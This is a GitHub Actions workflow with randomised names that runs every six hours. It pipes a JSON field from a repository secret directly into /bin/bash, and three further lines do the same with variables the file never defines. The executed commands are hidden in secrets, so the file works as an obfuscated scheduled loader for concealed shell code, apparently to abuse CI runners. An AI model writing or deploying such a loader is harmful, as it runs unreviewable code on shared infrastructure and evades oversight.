name: yangweiguo6457
on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangweiguo6457
        env:
          fel2: ${{ secrets.fel2 }}
        run: |
          echo $fel2 | jq -r .pg613 | /bin/bash
          echo $ixonz62 | jq -r .wn92 | /bin/bash
          echo $bpe598 | jq -r .hnwq16 | /bin/bash
          echo $mezq581 | jq -r .al7586 | /bin/bash

